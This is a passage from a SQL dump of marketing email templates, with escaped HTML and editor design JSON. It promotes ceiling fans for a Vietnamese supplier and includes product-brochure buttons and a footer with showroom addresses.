5bSnxx7M\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jz40CXaHYv\\\",\\\"contents\\\":[{\\\"id\\\":\\\"zFw374rru6\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"40px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-black\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/linkedin.com\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/\\\",\\\"name\\\":\\\"Twitter\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":15,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"YGvjojNYO8\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#333333\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"180%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_14\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 21.6px;\\\\\\\">GI\\u1ea2I PH\\u00c1P L\\u00c0M M\\u00c1T TO\\u00c0N DI\\u1ec6N KH\\u00d4NG GIAN NH\\u00c0 \\u1ede - V\\u0102N PH\\u00d2NG - NH\\u00c0 X\\u01af\\u1edeNG C\\u00d4NG NGHI\\u1ec6P<\\/span><\\/strong><\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong>SR THU DUC: <\\/strong>184 Tran Luu, An Phu, Thu Duc, HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><strong>SR QU\\u1eacN 7: <\\/strong>812 Happy Valley, Nguyen Van Linh, Tan Phong, District 7, HCM<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\">WIT.\\u00a0 All rights reserved. <\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\">Tax: 0315778682<\\/span><br \\/><span style=\\\\\\\"font-size: 12px; line-height: 21.6px;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">Manage Preferences<\\/span> <\\/a>| <a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/haiku.hogiaphat.vn\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaGFpa3UuaG9naWFwaGF0LnZuIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><span style=\\\\\\\"text-decoration: underline; font-size: 12px; line-height: 21.6px;\\\\\\\">View in browser<\\/span>\\u00a0<\\/a><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_16\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Montserrat\\\",\\\"value\\\":\\\"\'Montserrat\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\",\\\"defaultFont\\\":true},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#fdf4ef\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '', 1, '2023-03-26 16:56:58');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(17, 'SUNON-Commercial-Fans', '', 0, 1, 'english', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-25 {\\r\\n    width: 150px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-33p33 {\\r\\n    width: 199.98px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #363675; text-decoration: none; } @media (max-width: 480px) { #u_content_social_1 .v-container-padding-padding { padding: 10px !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #fbfdff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #fbfdff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:40px 10px 19px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167194545-logo_sunon.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 81%;max-width: 469.8px;\\\" width=\\\"469.8\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #000000; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">\\u00a0Qu\\u1ea1t treo tr\\u1ea7n c\\u00e1nh l\\u1edbn HVLS c\\u00f3 th\\u1ec3 s\\u1eed d\\u1ee5ng \\u0111\\u1ec3 t\\u1ea1o ra m\\u00f4i tr\\u01b0\\u1eddng th\\u00e2n thi\\u1ec7n trong c\\u00e1c lo\\u1ea1i kh\\u00f4ng gian nh\\u01b0 nh\\u00e0 \\u1edf, v\\u0103n ph\\u00f2ng v\\u00e0 nh\\u00e0 m\\u00e1y c\\u00f4ng nghi\\u1ec7p.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: 400;\\\">M\\u1ed9t kho\\u1ea3nh kh\\u1eafc th\\u01b0 gi\\u00e3n v\\u1edbi l\\u00e0n gi\\u00f3 m\\u1ea1nh v\\u00e0 d\\u1ecbu d\\u00e0ng<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1680167271523-Powerful1-02.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h4 style=\\\"margin: 0px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word; font-family: \'Open Sans\',sans-serif; font-size: 16px; font-weight: 400;\\\">MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe PHONG C\\u00c1CH CHO T\\u1eeaNG KH\\u00d4NG GIAN S\\u1ed0NG<\\/h4>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h2 style=\\\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-family: helvetica,sans-serif; font-size: 20px; font-weight: 700;\\\">Powerful HVLS Fan series 1<\\/h2>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\" style=\\\"height:54px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/H-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">MODERN HVLS<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"150\\\" style=\\\"width: 150px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-25\\\" style=\\\"max-width: 320px;min-width: 150px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td class=\\\"v-container-padding-padding\\\" style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\" style=\\\"height:54px; v-text-anchor:middle; width:130px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#e67e23\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/I-series.pdf\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #e67e23; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">SUNON SERIES 1<\\/span><\\/span>\\r\\n    